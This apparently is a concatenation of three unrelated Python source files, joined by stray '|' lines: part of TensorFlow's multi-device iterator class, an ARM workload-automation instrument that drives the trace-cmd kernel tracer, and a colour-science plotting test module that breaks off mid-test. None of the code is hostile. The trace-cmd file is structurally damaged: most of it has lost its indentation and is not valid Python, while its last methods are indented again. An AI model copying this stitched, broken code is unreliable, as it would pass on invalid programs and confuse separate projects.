    return (tuple(self._devices), self._source_device, self._element_spec)
  @property
  def _component_specs(self):
    # Two fixed components (iterator resource + deleter variant) followed by
    # one IteratorSpec per device.
    fixed = [
        tensor_spec.TensorSpec([], dtypes.resource),
        tensor_spec.TensorSpec([], dtypes.variant)
    ]
    per_device = [
        iterator_ops.IteratorSpec(self._element_spec) for _ in self._devices
    ]
    return fixed + per_device
  def _to_components(self, value):
    # pylint: disable=protected-access
    return ([value._multi_device_iterator_resource, value._deleter]
            + list(value._device_iterators))
  def _from_components(self, components):
    return OwnedMultiDeviceIterator(
        dataset=None,
        devices=self._devices,
        source_device=self._source_device,
        components=components,
        element_spec=self._element_spec)
  @staticmethod
  def from_value(value):
    """Builds a spec describing the given `OwnedMultiDeviceIterator`."""
    # pylint: disable=protected-access
    return MultiDeviceIteratorSpec(
        value._devices,
        value._source_device,
        value.element_spec)
class OwnedMultiDeviceIterator(composite_tensor.CompositeTensor):
  """An iterator over multiple devices.
  The multi-device iterator resource created through `OwnedMultiDeviceIterator`
  is owned by the Python object and the life time of the underlying resource is
  tied to the life time of the `OwnedMultiDeviceIterator` object. This makes
  `OwnedMultiDeviceIterator` appropriate for use in eager mode and inside of
  tf.functions.
  """
  def __init__(self,
               dataset=None,
               devices=None,
               max_buffer_size=1,
               prefetch_buffer_size=1,
               source_device="/cpu:0",
               components=None,
               element_spec=None):
    """Constructs an owned MultiDeviceIterator object.
    Args:
      dataset: The input dataset to be iterated over.
      devices: The list of devices to fetch data to.
      max_buffer_size: Maximum size of the host side per device buffer to keep.
      prefetch_buffer_size: if > 0, then we setup a buffer on each device to
        prefetch into.
      source_device: The host device to place the `dataset` on. In order to
        prevent deadlocks, if the prefetch_buffer_size is greater than the
        max_buffer_size, we set the max_buffer_size to prefetch_buffer_size.
      components: Tensor components to construct the MultiDeviceIterator from.
      element_spec: A nested structure of `TypeSpec` objects that
        represents the type specification of elements of the iterator.
    Raises:
      RuntimeError: If executed in graph mode or outside of function building
        mode.
      ValueError: If `devices` is missing, or if `dataset` and
        `components`/`element_spec` are provided inconsistently.
    """
    if not context.executing_eagerly() and not ops.inside_function():
      raise RuntimeError("OwnedMultiDeviceIterator is only supported inside of "
                         "tf.function or when eager execution is enabled.")
    if devices is None:
      raise ValueError("`devices` must be provided")
    # BUG FIX: the message was previously split across two statements, so the
    # second string literal was a no-op expression and the raised message was
    # truncated. Parenthesize for implicit concatenation.
    error_message = ("Either `dataset` or both `components` and "
                     "`element_spec` need to be provided.")
    if dataset is None:
      # Reconstruction path (e.g. from MultiDeviceIteratorSpec components).
      if (components is None or element_spec is None):
        raise ValueError(error_message)
      self._element_spec = element_spec
      self._devices = devices
      self._source_device = source_device
      self._multi_device_iterator_resource = components[0]
      self._deleter = components[1]
      self._device_iterators = components[2:]
      iterator_handles = []
      for it in self._device_iterators:
        iterator_handles.append(it._iterator_resource)  # pylint: disable=protected-access
    else:
      # Fresh-construction path: build the resource and per-device pipelines.
      if (components is not None or element_spec is not None):
        raise ValueError(error_message)
      options = dataset_ops.Options()
      options.experimental_distribute.num_devices = len(devices)
      dataset = dataset.with_options(options)
      dataset = dataset._apply_options()  # pylint: disable=protected-access
      self._element_spec = dataset.element_spec
      experimental_slack = dataset.options().experimental_slack
      self._devices = devices
      self._source_device = source_device
      source_device_tensor = ops.convert_to_tensor(self._source_device)
      # Keep max_buffer_size >= prefetch_buffer_size to prevent deadlocks
      # (see the docstring above).
      if prefetch_buffer_size > max_buffer_size:
        max_buffer_size = prefetch_buffer_size
      # Create the MultiDeviceIterator.
      with ops.device(self._source_device):
        self._multi_device_iterator_resource, self._deleter = (
            gen_dataset_ops.anonymous_multi_device_iterator(
                devices=self._devices, **dataset._flat_structure))  # pylint: disable=protected-access
        # The incarnation ID is used to ensure consistency between the
        # per-device iterators and the multi-device iterator.
        incarnation_id = gen_dataset_ops.multi_device_iterator_init(
            dataset._variant_tensor,  # pylint: disable=protected-access
            self._multi_device_iterator_resource,
            max_buffer_size=max_buffer_size)
      prototype_device_datasets = []
      for i, device in enumerate(self._devices):
        with ops.device(device):
          ds = _PerDeviceGenerator(i, self._multi_device_iterator_resource,
                                   incarnation_id, source_device_tensor,
                                   dataset.element_spec)
          prototype_device_datasets.append(ds)
      # TODO(rohanj): Explore the possibility of the MultiDeviceIterator to
      # initialize the device side of the pipeline. This would allow the
      # MultiDeviceIterator to choose, for example, to move some transformations
      # into the device side from its input. It might be useful in rewriting.
      # Create the per device iterators.
      self._device_iterators = []
      iterator_handles = []
      for i, device in enumerate(self._devices):
        with ops.device(device):
          ds = _create_device_dataset(prototype_device_datasets[i],
                                      incarnation_id, prefetch_buffer_size,
                                      experimental_slack)
          iterator = iter(ds)
          self._device_iterators.append(iterator)
          iterator_handles.append(iterator._iterator_resource)  # pylint: disable=protected-access
    # Register cycle-safe cleanup for the resource and per-device iterators.
    self._resource_deleter = MultiDeviceIteratorResourceDeleter(
        multi_device_iterator=self._multi_device_iterator_resource,
        iterators=iterator_handles,
        device=self._source_device,
        deleter=self._deleter)
  def get_next(self, device=None):
    """Returns the next element given a `device`, else returns all in a list."""
    if device is not None:
      index = self._devices.index(device)
      return self._device_iterators[index].get_next()
    result = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        result.append(self._device_iterators[i].get_next())
    return result
  def __iter__(self):
    return self
  def next(self):
    # Python 2 compatibility alias for __next__.
    return self.__next__()
  def __next__(self):
    try:
      return self.get_next()
    except errors.OutOfRangeError:
      raise StopIteration
  def get_next_as_optional(self):
    """Returns per-device Optionals so exhaustion can be detected safely."""
    result = []
    for i, device in enumerate(self._devices):
      with ops.device(device):
        result.append(self._device_iterators[i].get_next_as_optional())
    return result
  @property
  def element_spec(self):
    return self._element_spec
  @property
  def _type_spec(self):
    return MultiDeviceIteratorSpec(self._devices, self._source_device,
                                   self._element_spec)
|
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=W0613,E1101
from __future__ import division
import os
import time
import subprocess
from collections import defaultdict
from wlauto import Instrument, Parameter, Executable
from wlauto.exceptions import InstrumentError, ConfigError
from wlauto.core import signal
from wlauto.utils.types import boolean
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_TEXT_FILE = '{}.txt'.format(os.path.splitext(OUTPUT_TRACE_FILE)[0])
TIMEOUT = 180
class TraceCmdInstrument(Instrument):
name = 'trace-cmd'
description = """
trace-cmd is an instrument which interacts with Ftrace Linux kernel internal
tracer
From trace-cmd man page:
trace-cmd command interacts with the Ftrace tracer that is built inside the
Linux kernel. It interfaces with the Ftrace specific files found in the
debugfs file system under the tracing directory.
trace-cmd reads a list of events it will trace, which can be specified in
the config file as follows ::
trace_events = ['irq*', 'power*']
If no event is specified in the config file, trace-cmd traces the following events:
- sched*
- irq*
- power*
- cpufreq_interactive*
The list of available events can be obtained by rooting and running the following
command line on the device ::
trace-cmd list
You may also specify ``trace_buffer_size`` setting which must be an integer that will
be used to set the ftrace buffer size. It will be interpreted as KB::
trace_cmd_buffer_size = 8000
The maximum buffer size varies from device to device, but there is a maximum and trying
to set buffer size beyound that will fail. If you plan on collecting a lot of trace over
long periods of time, the buffer size will not be enough and you will only get trace for
the last portion of your run. To deal with this you can set the ``trace_mode`` setting to
``'record'`` (the default is ``'start'``)::
trace_cmd_mode = 'record'
This will cause trace-cmd to trace into file(s) on disk, rather than the buffer, and so the
limit for the max size of the trace is set by the storage available on device. Bear in mind
that ``'record'`` mode *is* more instrusive than the default, so if you do not plan on
generating a lot of trace, it is best to use the default ``'start'`` mode.
.. note:: Mode names correspend to the underlying trace-cmd exectuable's command used to
implement them. You can find out more about what is happening in each case from
trace-cmd documentation: https://lwn.net/Articles/341902/.
This instrument comes with an Android trace-cmd binary that will be copied and used on the
device, however post-processing will be done on-host and you must have trace-cmd installed and
in your path. On Ubuntu systems, this may be done with::
sudo apt-get install trace-cmd
"""
parameters = [
Parameter('events', kind=list, default=['sched*', 'irq*', 'power*', 'cpufreq_interactive*'],
global_alias='trace_events',
description="""
Specifies the list of events to be traced. Each event in the list will be passed to
trace-cmd with -e parameter and must be in the format accepted by trace-cmd.
"""),
Parameter('mode', default='start', allowed_values=['start', 'record'],
global_alias='trace_mode',
description="""
Trace can be collected using either 'start' or 'record' trace-cmd
commands. In 'start' mode, trace will be collected into the ftrace buffer;
in 'record' mode, trace will be written into a file on the device's file
system. 'start' mode is (in theory) less intrusive than 'record' mode, however
it is limited by the size of the ftrace buffer (which is configurable --
see ``buffer_size`` -- but only up to a point) and that may overflow
for long-running workloads, which will result in dropped events.
"""),
Parameter('buffer_size', kind=int, default=None,
global_alias='trace_buffer_size',
description="""
Attempt to set ftrace buffer size to the specified value (in KB). Default buffer size
may need to be increased for long-running workloads, or if a large number
of events have been enabled. Note: there is a maximum size that the buffer can
be set, and that varies from device to device. Attempting to set buffer size higher
than this will fail. In that case, this instrument will set the size to the highest
possible value by going down from the specified size in ``buffer_size_step`` intervals.
"""),
Parameter('buffer_size_step', kind=int, default=1000,
global_alias='trace_buffer_size_step',
description="""
Defines the decremental step used if the specified ``buffer_size`` could not be set.
This will be subtracted form the buffer size until set succeeds or size is reduced to
1MB.
"""),
Parameter('buffer_size_file', default='/d/tracing/buffer_size_kb',
description="""
Path to the debugs file that may be used to set ftrace buffer size. This should need
to be modified for the vast majority devices.
"""),
Parameter('report', kind=boolean, default=True,
description="""
Specifies whether host-side reporting should be performed once the binary trace has been
pulled form the device.
.. note:: This requires the latest version of trace-cmd to be installed on the host (the
one in your distribution's repos may be too old).
"""),
Parameter('no_install', kind=boolean, default=False,
description="""
Do not install the bundled trace-cmd and use the one on the device instead. If there is
not already a trace-cmd on the device, an error is raised.
"""),
]
def __init__(self, device, **kwargs):
super(TraceCmdInstrument, self).__init__(device, **kwargs)
self.trace_cmd = None
self.event_string = _build_trace_events(self.events)
self.output_file = os.path.join(self.device.working_directory, OUTPUT_TRACE_FILE)
self.temp_trace_file = self.device.path.join(self.device.working_directory, OUTPUT_TRACE_FILE)
def on_run_init(self, context):
if not self.device.is_rooted:
raise InstrumentError('trace-cmd instrument cannot be used on an unrooted device.')
if not self.no_install:
host_file = context.resolver.get(Executable(self, self.device.abi, 'trace-cmd'))
self.trace_cmd = self.device.install_executable(host_file)
else:
if not self.device.is_installed('trace-cmd'):
raise ConfigError('No trace-cmd found on device and no_install=True is specified.')
self.trace_cmd = 'trace-cmd'
# Register ourselves as absolute last event before and
# first after so we can mark the trace at the right time
signal.connect(self.insert_start_mark, signal.BEFORE_WORKLOAD_EXECUTION, priority=11)
signal.connect(self.insert_end_mark, signal.AFTER_WORKLOAD_EXECUTION, priority=11)
def setup(self, context):
if self.mode == 'start':
if self.buffer_size:
self._set_buffer_size()
self.device.execute('{} reset'.format(self.trace_cmd), as_root=True, timeout=180)
elif self.mode == 'record':
pass
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def start(self, context):
self.start_time = time.time() # pylint: disable=attribute-defined-outside-init
if self.mode == 'start':
self.device.execute('{} start {}'.format(self.trace_cmd, self.event_string), as_root=True)
elif self.mode == 'record':
self.device.kick_off('{} record -o {} {}'.format(self.trace_cmd, self.output_file, self.event_string))
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def stop(self, context):
self.stop_time = time.time() # pylint: disable=attribute-defined-outside-init
if self.mode == 'start':
self.device.execute('{} stop'.format(self.trace_cmd), timeout=60, as_root=True)
elif self.mode == 'record':
# There will be a trace-cmd worker process per CPU core plus a main
# control trace-cmd process. Interrupting the control process will
# trigger the generation of the single binary trace file.
trace_cmds = self.device.ps(name=self.trace_cmd)
if not trace_cmds:
raise InstrumentError('Could not find running trace-cmd on device.')
# The workers will have their PPID set to the PID of control.
parent_map = defaultdict(list)
for entry in trace_cmds:
parent_map[entry.ppid].append(entry.pid)
controls = [v[0] for _, v in parent_map.iteritems()
if len(v) == 1 and v[0] in parent_map]
if len(controls) > 1:
self.logger.warning('More than one trace-cmd instance found; stopping all of them.')
for c in controls:
self.device.kill(c, signal='INT', as_root=True)
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def update_result(self, context): # NOQA pylint: disable=R0912
if self.mode == 'start':
self.device.execute('{} extract -o {}'.format(self.trace_cmd, self.output_file),
timeout=TIMEOUT, as_root=True)
elif self.mode == 'record':
self.logger.debug('Waiting for trace.dat to be generated.')
while self.device.ps(name=self.trace_cmd):
time.sleep(2)
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
# The size of trace.dat will depend on how long trace-cmd was running.
# Therefore timout for the pull command must also be adjusted
# accordingly.
pull_timeout = (self.stop_time - self.start_time)
self.device.pull_file(self.output_file, context.output_directory, timeout=pull_timeout)
context.add_iteration_artifact('bintrace', OUTPUT_TRACE_FILE, kind='data',
description='trace-cmd generated ftrace dump.')
local_trace_file = os.path.join(context.output_directory, OUTPUT_TRACE_FILE)
local_txt_trace_file = os.path.join(context.output_directory, OUTPUT_TEXT_FILE)
if self.report:
# To get the output of trace.dat, trace-cmd must be installed
# This is done host-side because the generated file is very large
if not os.path.isfile(local_trace_file):
self.logger.warning('Not generating trace.txt, as trace.bin does not exist.')
try:
command = 'trace-cmd report {} > {}'.format(local_trace_file, local_txt_trace_file)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise InstrumentError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
# logged at debug level, as trace-cmd always outputs some
# errors that seem benign.
self.logger.debug(error)
if os.path.isfile(local_txt_trace_file):
context.add_iteration_artifact('txttrace', OUTPUT_TEXT_FILE, kind='export',
description='trace-cmd generated ftrace dump.')
self.logger.debug('Verifying traces.')
with open(local_txt_trace_file) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise InstrumentError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def teardown(self, context):
self.device.delete_file(os.path.join(self.device.working_directory, OUTPUT_TRACE_FILE))
def on_run_end(self, context):
pass
def validate(self):
if self.report and os.system('which trace-cmd > /dev/null'):
raise InstrumentError('trace-cmd is not in PATH; is it installed?')
if self.buffer_size:
if self.mode == 'record':
self.logger.debug('trace_buffer_size specified with record mode; it will be ignored.')
else:
try:
int(self.buffer_size)
except ValueError:
raise ConfigError('trace_buffer_size must be an int.')
def insert_start_mark(self, context):
# trace marker appears in ftrace as an ftrace/print event with TRACE_MARKER_START in info field
self.device.set_sysfile_value("/sys/kernel/debug/tracing/trace_marker", "TRACE_MARKER_START", verify=False)
    def insert_end_mark(self, context):
        """Write a stop marker into the kernel trace buffer.

        The marker appears in ftrace as an ftrace/print event with
        TRACE_MARKER_STOP in the info field.
        """
        self.device.set_sysfile_value("/sys/kernel/debug/tracing/trace_marker", "TRACE_MARKER_STOP", verify=False)
    def _set_buffer_size(self):
        # Try to set the ftrace buffer to the requested size. The kernel may
        # refuse large values, so back off in steps until a value "sticks",
        # then creep back up towards the target to find the largest size the
        # kernel will accept.
        target_buffer_size = self.buffer_size
        attempt_buffer_size = target_buffer_size
        buffer_size = 0
        # Do not probe below 1000 unless the target itself is smaller.
        floor = 1000 if target_buffer_size > 1000 else target_buffer_size
        while attempt_buffer_size >= floor:
            self.device.set_sysfile_value(self.buffer_size_file, attempt_buffer_size, verify=False)
            buffer_size = self.device.get_sysfile_value(self.buffer_size_file, kind=int)
            if buffer_size == attempt_buffer_size:
                # The kernel accepted this size exactly.
                break
            else:
                attempt_buffer_size -= self.buffer_size_step
        if buffer_size == target_buffer_size:
            return
        # The accepted size fell short of the target: probe upwards in steps
        # until the kernel stops honouring the request, then warn with the
        # value that actually stuck.
        while attempt_buffer_size < target_buffer_size:
            attempt_buffer_size += self.buffer_size_step
            self.device.set_sysfile_value(self.buffer_size_file, attempt_buffer_size, verify=False)
            buffer_size = self.device.get_sysfile_value(self.buffer_size_file, kind=int)
            if attempt_buffer_size != buffer_size:
                self.logger.warning('Failed to set trace buffer size to {}, value set was {}'.format(target_buffer_size, buffer_size))
                break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
|
|
"""Defines the unit tests for the :mod:`colour.plotting.common` module."""
import matplotlib.pyplot as plt
import numpy as np
import os
import shutil
import tempfile
import unittest
from functools import partial
from matplotlib.pyplot import Axes, Figure
import colour
from colour.colorimetry import SDS_ILLUMINANTS
from colour.io import read_image
from colour.models import RGB_COLOURSPACES, XYZ_to_sRGB, gamma_function
from colour.plotting import ColourSwatch
from colour.plotting import (
colour_style,
override_style,
XYZ_to_plotting_colourspace,
colour_cycle,
artist,
camera,
render,
label_rectangles,
uniform_axes3d,
filter_passthrough,
filter_RGB_colourspaces,
filter_cmfs,
filter_illuminants,
filter_colour_checkers,
update_settings_collection,
plot_single_colour_swatch,
plot_multi_colour_swatches,
plot_single_function,
plot_multi_functions,
plot_image,
)
from colour.utilities import attest
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestColourStyle",
"TestOverrideStyle",
"TestXyzToPlottingColourspace",
"TestColourCycle",
"TestArtist",
"TestCamera",
"TestRender",
"TestLabelRectangles",
"TestUniformAxes3d",
"TestFilterPassthrough",
"TestFilterRgbColourspaces",
"TestFilterCmfs",
"TestFilterIlluminants",
"TestFilterColourCheckers",
"TestUpdateSettingsCollection",
"TestPlotSingleColourSwatch",
"TestPlotMultiColourSwatches",
"TestPlotSingleFunction",
"TestPlotMultiFunctions",
"TestPlotImage",
]
class TestColourStyle(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.colour_style` definition unit tests
    methods.
    """

    def test_colour_style(self):
        """Test :func:`colour.plotting.common.colour_style` definition."""

        # With use_style=False only the settings dict is returned, without
        # mutating matplotlib's global rcParams.
        settings = colour_style(use_style=False)
        self.assertIsInstance(settings, dict)
class TestOverrideStyle(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.override_style` definition unit tests
    methods.
    """
    def test_override_style(self):
        """Test :func:`colour.plotting.common.override_style` definition."""
        # Remember the global rcParams value so it can be restored afterwards;
        # the decorator mutates matplotlib's shared state for the call.
        text_color = plt.rcParams["text.color"]
        try:
            @override_style(**{"text.color": "red"})
            def test_text_color_override():
                """Test :func:`colour.plotting.common.override_style` definition."""
                attest(plt.rcParams["text.color"] == "red")
            test_text_color_override()
        finally:
            plt.rcParams["text.color"] = text_color
class TestXyzToPlottingColourspace(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.XYZ_to_plotting_colourspace`
    definition unit tests methods.
    """

    def test_XYZ_to_plotting_colourspace(self):
        """
        Test :func:`colour.plotting.common.XYZ_to_plotting_colourspace`
        definition.
        """

        # Both conversions must agree for an arbitrary tristimulus input.
        tristimulus = np.random.random(3)
        np.testing.assert_almost_equal(
            XYZ_to_sRGB(tristimulus),
            XYZ_to_plotting_colourspace(tristimulus),
            decimal=7,
        )
class TestColourCycle(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.colour_cycle` definition unit tests
    methods.
    """

    def test_colour_cycle(self):
        """Test :func:`colour.plotting.common.colour_cycle` definition."""

        # Default cycle yields the documented RGBA values, in order.
        cycler = colour_cycle()
        expected_rgba = [
            np.array([0.95686275, 0.26274510, 0.21176471, 1.00000000]),
            np.array([0.61582468, 0.15423299, 0.68456747, 1.00000000]),
            np.array([0.25564014, 0.31377163, 0.70934256, 1.00000000]),
        ]
        for rgba in expected_rgba:
            np.testing.assert_almost_equal(next(cycler), rgba, decimal=7)

        # A named matplotlib colour map can be used as the cycle source.
        cycler = colour_cycle(colour_cycle_map="viridis")
        np.testing.assert_almost_equal(
            next(cycler),
            np.array([0.26700400, 0.00487400, 0.32941500, 1.00000000]),
            decimal=7,
        )
class TestArtist(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.artist` definition unit tests
    methods.
    """

    def test_artist(self):
        """Test :func:`colour.plotting.common.artist` definition."""

        first_figure, first_axes = artist()
        self.assertIsInstance(first_figure, Figure)
        self.assertIsInstance(first_axes, Axes)

        # Passing existing axes must return that same axes object.
        _figure, reused_axes = artist(axes=first_axes, uniform=True)
        self.assertIs(first_axes, reused_axes)

        # A uniform figure is square.
        uniform_figure, _axes = artist(uniform=True)
        self.assertEqual(
            uniform_figure.get_figwidth(), uniform_figure.get_figheight()
        )
class TestCamera(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.camera` definition unit tests
    methods.
    """

    def test_camera(self):
        """Test :func:`colour.plotting.common.camera` definition."""

        figure, _axes = artist()
        axes_3d = figure.add_subplot(111, projection="3d")

        # The requested viewpoint must be applied to the 3D axes.
        _figure, axes_3d = camera(axes=axes_3d, elevation=45, azimuth=90)

        self.assertEqual(axes_3d.elev, 45)
        self.assertEqual(axes_3d.azim, 90)
class TestRender(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.render` definition unit tests
    methods.
    """
    def setUp(self):
        """Initialise the common tests attributes."""
        # Scratch directory for the file-output variant of render().
        self._temporary_directory = tempfile.mkdtemp()
    def tearDown(self):
        """After tests actions."""
        shutil.rmtree(self._temporary_directory)
    def test_render(self):
        """Test :func:`colour.plotting.common.render` definition."""
        figure, axes = artist()
        # Exercise the full keyword surface in non-standalone mode.
        render(
            figure=figure,
            axes=axes,
            standalone=False,
            aspect="equal",
            axes_visible=True,
            bounding_box=[0, 1, 0, 1],
            tight_layout=False,
            legend=True,
            legend_columns=2,
            transparent_background=False,
            title="Render Unit Test",
            wrap_title=True,
            x_label="x Label",
            y_label="y Label",
            x_ticker=False,
            y_ticker=False,
        )
        # Standalone mode displays/finalises the current figure.
        render(standalone=True)
        # File output path: writes an image into the scratch directory.
        render(
            filename=os.path.join(self._temporary_directory, "render.png"),
            axes_visible=False,
        )
class TestLabelRectangles(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.label_rectangles` definition unit
    tests methods.
    """

    def test_label_rectangles(self):
        """Test :func:`colour.plotting.common.label_rectangles` definition."""

        figure, axes = artist()

        heights = np.linspace(0, 1, 10)
        _figure, axes = label_rectangles(
            heights, axes.bar(heights, 1), figure=figure, axes=axes
        )

        # One text label is attached per bar.
        self.assertEqual(len(axes.texts), len(heights))
class TestUniformAxes3d(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.uniform_axes3d` definition unit tests
    methods.
    """

    def test_uniform_axes3d(self):
        """Test :func:`colour.plotting.common.uniform_axes3d` definition."""

        figure, _axes = artist()
        axes_3d = figure.add_subplot(111, projection="3d")

        uniform_axes3d(axes=axes_3d)

        # All three axis ranges must agree after equalisation.
        self.assertEqual(axes_3d.get_xlim(), axes_3d.get_ylim())
        self.assertEqual(axes_3d.get_xlim(), axes_3d.get_zlim())
class TestFilterPassthrough(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.filter_passthrough` definition unit
    tests methods.
    """
    def test_filter_passthrough(self):
        """Test :func:`colour.plotting.common.filter_passthrough` definition."""
        # Regex filtering over a mapping of colourspaces.
        self.assertListEqual(
            sorted(
                colourspace.name
                for colourspace in filter_passthrough(
                    RGB_COLOURSPACES, ["^ACES.*"]
                ).values()
            ),
            ["ACES2065-1", "ACEScc", "ACEScct", "ACEScg", "ACESproxy"],
        )
        # Anchored and case-insensitive matches resolve to the same key.
        self.assertListEqual(
            sorted(filter_passthrough(RGB_COLOURSPACES, ["^ACEScc$"]).keys()),
            ["ACEScc"],
        )
        self.assertListEqual(
            sorted(filter_passthrough(RGB_COLOURSPACES, ["^acescc$"]).keys()),
            ["ACEScc"],
        )
        # Non-sibling objects are dropped unless explicitly allowed...
        self.assertDictEqual(
            filter_passthrough(
                SDS_ILLUMINANTS,
                [SDS_ILLUMINANTS["D65"], {"Is": "Excluded"}],
                allow_non_siblings=False,
            ),
            {"D65": SDS_ILLUMINANTS["D65"]},
        )
        # ...and passed through when allow_non_siblings=True.
        self.assertDictEqual(
            filter_passthrough(
                SDS_ILLUMINANTS,
                [SDS_ILLUMINANTS["D65"], {"Is": "Included"}],
                allow_non_siblings=True,
            ),
            {"D65": SDS_ILLUMINANTS["D65"], "Is": "Included"},
        )
        # Plain mappings of arbitrary values are also supported.
        self.assertListEqual(
            sorted(
                element
                for element in filter_passthrough(
                    {"John": "Doe", "Luke": "Skywalker"}, ["John"]
                ).values()
            ),
            ["Doe", "John"],
        )
class TestFilterRgbColourspaces(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.filter_RGB_colourspaces` definition
    unit tests methods.
    """

    def test_filter_RGB_colourspaces(self):
        """
        Test :func:`colour.plotting.common.filter_RGB_colourspaces`
        definition.
        """

        matches = filter_RGB_colourspaces(["^ACES.*"]).values()
        self.assertListEqual(
            sorted(colourspace.name for colourspace in matches),
            ["ACES2065-1", "ACEScc", "ACEScct", "ACEScg", "ACESproxy"],
        )
class TestFilterCmfs(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.filter_cmfs` definition unit tests
    methods.
    """

    def test_filter_cmfs(self):
        """Test :func:`colour.plotting.common.filter_cmfs` definition."""

        names = [cmfs.name for cmfs in filter_cmfs([".*2 Degree.*"]).values()]
        self.assertListEqual(
            sorted(names),
            [
                "CIE 1931 2 Degree Standard Observer",
                "CIE 2012 2 Degree Standard Observer",
                "Stiles & Burch 1955 2 Degree RGB CMFs",
                "Stockman & Sharpe 2 Degree Cone Fundamentals",
                "Wright & Guild 1931 2 Degree RGB CMFs",
            ],
        )
class TestFilterIlluminants(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.filter_illuminants` definition unit
    tests methods.
    """

    def test_filter_illuminants(self):
        """Test :func:`colour.plotting.common.filter_illuminants` definition."""

        daylight_keys = filter_illuminants(["^D.*"]).keys()
        self.assertListEqual(
            sorted(daylight_keys),
            ["D50", "D55", "D60", "D65", "D75", "Daylight FL"],
        )
class TestFilterColourCheckers(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.filter_colour_checkers` definition
    unit tests methods.
    """

    def test_filter_colour_checkers(self):
        """Test :func:`colour.plotting.common.filter_colour_checkers` definition."""

        names = [
            colour_checker.name
            for colour_checker in filter_colour_checkers([".*24.*"]).values()
        ]
        self.assertListEqual(
            sorted(names),
            [
                "ColorChecker24 - After November 2014",
                "ColorChecker24 - Before November 2014",
            ],
        )
class TestUpdateSettingsCollection(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.update_settings_collection`
    definition unit tests methods.
    """

    def test_update_settings_collection(self):
        """
        Test :func:`colour.plotting.common.update_settings_collection`
        definition.
        """

        # A single settings dict is broadcast onto every collection element.
        settings_collection = [{1: 2}, {3: 4}]
        update_settings_collection(settings_collection, {5: 6}, 2)
        self.assertListEqual(settings_collection, [{1: 2, 5: 6}, {3: 4, 5: 6}])

        # A sequence of settings dicts is applied element-wise.
        settings_collection = [{1: 2}, {3: 4}]
        update_settings_collection(settings_collection, [{5: 6}, {7: 8}], 2)
        self.assertListEqual(settings_collection, [{1: 2, 5: 6}, {3: 4, 7: 8}])
class TestPlotSingleColourSwatch(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.plot_single_colour_swatch` definition
    unit tests methods.
    """

    def test_plot_single_colour_swatch(self):
        """
        Test :func:`colour.plotting.common.plot_single_colour_swatch`
        definition.
        """

        # Both ColourSwatch instances and bare arrays are accepted.
        for swatch in (
            ColourSwatch((0.45620519, 0.03081071, 0.04091952)),
            np.array([0.45620519, 0.03081071, 0.04091952]),
        ):
            figure, axes = plot_single_colour_swatch(swatch)
            self.assertIsInstance(figure, Figure)
            self.assertIsInstance(axes, Axes)
class TestPlotMultiColourSwatches(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.plot_multi_colour_swatches`
    definition unit tests methods.
    """
    def test_plot_multi_colour_swatches(self):
        """
        Test :func:`colour.plotting.common.plot_multi_colour_swatches`
        definition.
        """
        # A list of ColourSwatch instances is accepted.
        figure, axes = plot_multi_colour_swatches(
            [
                ColourSwatch((0.45293517, 0.31732158, 0.26414773)),
                ColourSwatch((0.77875824, 0.57726450, 0.50453169)),
            ]
        )
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
        # A bare array of swatch colours also works, here with an alternate
        # stacking direction.
        figure, axes = plot_multi_colour_swatches(
            np.array(
                [
                    [0.45293517, 0.31732158, 0.26414773],
                    [0.77875824, 0.57726450, 0.50453169],
                ]
            ),
            direction="-y",
        )
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
class TestPlotSingleFunction(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.plot_single_function` definition unit
    tests methods.
    """

    def test_plot_single_function(self):
        """Test :func:`colour.plotting.common.plot_single_function` definition."""

        # An inverse-gamma (~1/2.2) function serves as the probe.
        probe = partial(gamma_function, exponent=1 / 2.2)
        figure, axes = plot_single_function(probe)

        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
class TestPlotMultiFunctions(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.plot_multi_functions` definition unit
    tests methods.
    """
    def test_plot_multi_functions(self):
        """Test :func:`colour.plotting.common.plot_multi_functions` definition."""
        functions = {
            "Gamma 2.2": lambda x: x ** (1 / 2.2),
